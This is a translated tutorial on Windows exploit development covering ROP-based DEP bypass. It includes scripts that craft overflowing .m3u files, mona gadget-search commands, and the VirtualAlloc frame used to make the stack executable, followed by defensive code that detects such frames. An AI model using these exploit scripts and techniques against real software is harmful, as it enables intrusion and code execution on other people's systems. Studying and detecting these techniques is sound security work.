[Translation] Windows Exploit Development Series, Part 7: Return Oriented Programming (ROP)
Published: 2016-1-13 18:04
(1) Pointer that directly executes RETN:

ESP -> ???????? => RETN
       ???????? => RETN
       ???????? => RETN
       ???????? => RETN

(1) Here each RETN only increments ESP; nothing else is executed.

(2) Pointer to some instructions followed by RETN:

ESP -> ???????? => POP EAX # RETN
       ffffffff => we put this value in EAX
       ???????? => INC EAX # RETN
       ???????? => XCHG EAX,EDX # RETN

(2) Gadgets are used to zero EDX (0xffffffff + 1 wraps to 0, which is then swapped into EDX).
#!/usr/bin/python
# Stage 1: generate the crash file. The four "B" bytes overwrite the saved
# return address (EIP) and the "C" block is what ESP points to afterwards.
import sys, struct
file="crash.m3u"
#---------------------------------------------------------------------#
# Badchars: '\x00\x09\x0A'                                            #
#---------------------------------------------------------------------#
crash = "http://." + "A"*17416 + "B"*4 + "C"*7572
writeFile = open(file, "w")
writeFile.write(crash)
writeFile.close()
!mona modules
!mona ropfunc -m MSRMfilter03.dll -cpb '\x00\x09\x0a'
!mona rop -m MSRMfilter03.dll -cpb '\x00\x09\x0a'
#!/usr/bin/python
# Stage 2: replace the EIP overwrite with the address of a RETN gadget so
# that execution continues into the chain that starts at ESP.
import sys, struct
file="crash.m3u"
rop = struct.pack('<L',0x41414141) # padding to compensate 4-bytes at ESP
#---------------------------------------------------------------------#
# Badchars: '\x00\x09\x0a'                                            #
# kernel32.virtualalloc: 0x1005d060 (MSRMfilter03.dll)                #
# EIP: 0x10019C60 Random RETN (MSRMfilter03.dll)                      #
#---------------------------------------------------------------------#
crash = "http://." + "A"*17416 + "\x60\x9C\x01\x10" + rop + "C"*(7572-len(rop))
writeFile = open(file, "w")
writeFile.write(crash)
writeFile.close()
Structure:                              Parameters (as laid out on the stack):
LPVOID WINAPI VirtualAlloc(             => A pointer to VirtualAlloc()
    _In_opt_ LPVOID lpAddress,          => Return Address (redirect execution to ESP)
    _In_     SIZE_T dwSize,             => dwSize (0x1)
    _In_     DWORD  flAllocationType,   => flAllocationType (0x1000)
    _In_     DWORD  flProtect           => flProtect (0x40)
);
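The frame above is what a DEP-bypass chain leaves on the stack at the moment it returns into VirtualAlloc. As an added example, not code from the tutorial or its author, the following Python decodes such a frame and applies the two checks an API-hooking monitor or crash-dump triage script would use on it: a request for an executable (especially writable and executable) protection, and a return address that falls inside the very region being made executable. The constants are the documented Win32 values; the decoder assumes the standard stdcall layout (callee pointer, return address, then the four parameters in declaration order); the stack address and both sample frames are constructed for the example.

```python
import struct

# Documented Win32 constants for VirtualAlloc (values from the Windows SDK).
MEM_COMMIT = 0x1000
PAGE_READWRITE = 0x04
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
PAGE_SIZE = 0x1000

EXECUTABLE = {PAGE_EXECUTE, PAGE_EXECUTE_READ,
              PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}
WRITABLE_AND_EXECUTABLE = {PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}

# Stack layout when a chain returns into VirtualAlloc, lowest address first:
# the callee pointer that RETN pops into EIP, the return address VirtualAlloc
# will RET to, then its four parameters in declaration order (stdcall,
# little-endian DWORDs). Assumed standard layout, not taken from the tutorial.
FRAME_FIELDS = ("virtualalloc_ptr", "return_addr", "lpAddress",
                "dwSize", "flAllocationType", "flProtect")
FRAME_SIZE = 4 * len(FRAME_FIELDS)


def decode_virtualalloc_frame(stack_bytes):
    """Unpack the six DWORDs of a VirtualAlloc call frame into a dict."""
    if len(stack_bytes) < FRAME_SIZE:
        raise ValueError("need %d bytes, got %d" % (FRAME_SIZE, len(stack_bytes)))
    return dict(zip(FRAME_FIELDS, struct.unpack("<6L", stack_bytes[:FRAME_SIZE])))


def executable_region(frame):
    """Page-rounded [start, end) that VirtualAlloc would change: lpAddress is
    rounded down to a page boundary and the size rounded up to whole pages."""
    start = frame["lpAddress"] & ~(PAGE_SIZE - 1)
    end = (frame["lpAddress"] + frame["dwSize"] + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1)
    return start, end


def assess_frame(frame):
    """Return the reasons this call looks like a DEP bypass; [] means nothing stood out."""
    reasons = []
    protect = frame["flProtect"]
    if protect in WRITABLE_AND_EXECUTABLE:
        reasons.append("writable+executable protection 0x%02x requested" % protect)
    elif protect in EXECUTABLE:
        reasons.append("executable protection 0x%02x requested" % protect)
    # Only meaningful when a concrete address is committed with execute rights.
    if protect in EXECUTABLE and frame["flAllocationType"] & MEM_COMMIT and frame["lpAddress"]:
        start, end = executable_region(frame)
        if start <= frame["return_addr"] < end:
            reasons.append("return address 0x%08x lies inside the region "
                           "[0x%08x, 0x%08x) being made executable"
                           % (frame["return_addr"], start, end))
    return reasons


# Constructed sample: the tutorial's parameter values (dwSize 0x1,
# flAllocationType 0x1000, flProtect 0x40) with a made-up stack address
# standing in for ESP and the VirtualAlloc pointer quoted in the script above.
SHELLCODE_ADDR = 0x0012F3A0  # constructed stack address
ROP_FRAME = struct.pack("<6L", 0x1005D060, SHELLCODE_ADDR, SHELLCODE_ADDR,
                        0x1, MEM_COMMIT, PAGE_EXECUTE_READWRITE)

# Constructed benign frame: an ordinary committed read/write allocation.
BENIGN_FRAME = struct.pack("<6L", 0x1005D060, 0x00401234, 0x0,
                           0x10000, MEM_COMMIT, PAGE_READWRITE)

if __name__ == "__main__":
    for label, raw in (("rop", ROP_FRAME), ("benign", BENIGN_FRAME)):
        frame = decode_virtualalloc_frame(raw)
        print(label, {k: hex(v) for k, v in frame.items()})
        for reason in assess_frame(frame) or ["nothing suspicious"]:
            print("  -", reason)
```

The second check is the one that separates this pattern from legitimate JIT-style allocations: a compiler that requests PAGE_EXECUTE_READWRITE normally returns to code that already exists, whereas the chain above returns straight into the page it has just made executable. Because VirtualAlloc rounds lpAddress down and dwSize up to page granularity, a dwSize of 0x1 still turns the whole page at ESP executable, which is why the region is computed page-aligned rather than from the raw parameters.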